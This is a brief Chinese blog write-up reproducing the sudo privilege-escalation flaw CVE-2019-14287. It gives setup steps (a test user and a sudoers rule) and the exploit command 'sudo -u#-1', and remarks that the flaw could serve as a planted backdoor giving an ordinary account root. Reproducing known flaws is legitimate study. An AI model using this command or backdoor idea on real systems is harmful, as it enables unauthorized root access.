CVE-2019-14287_sudo权限提升

影响范围

sudo是linux下普通用户使用root权限的命令，sudo配置文件中使用 ALL 语句，可以使普通账号通过vim执行root权限命令。

影响 sudo 1.8.28 之前的所有版本。

漏洞复现

1.查看版本 sudo -V
2.新建普通账号

useradd test
passwd test

3.修改sudo文件
vi /etc/sudoers 添加 test ALL=(ALL:ALL) ALL
4.以普通用户test编辑执行命令
普通执行，是查看不了root权限的文件。
执行 sudo -u#-1 命令

漏洞有点鸡肋，需先修改sudoers文件，顶多做个预留后门，后期使普通账户拥有最高权限。

相关文章：

2022-12-23
2021-12-24
2021-12-16
2021-11-17
2021-07-17
2021-08-22

猜你喜欢

2021-05-29
2022-12-23
2021-08-12
2022-12-23
2021-09-04
2021-12-25
2021-08-15

相关资源

下载 2023-01-28
下载 2021-06-22
下载 2023-01-23

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode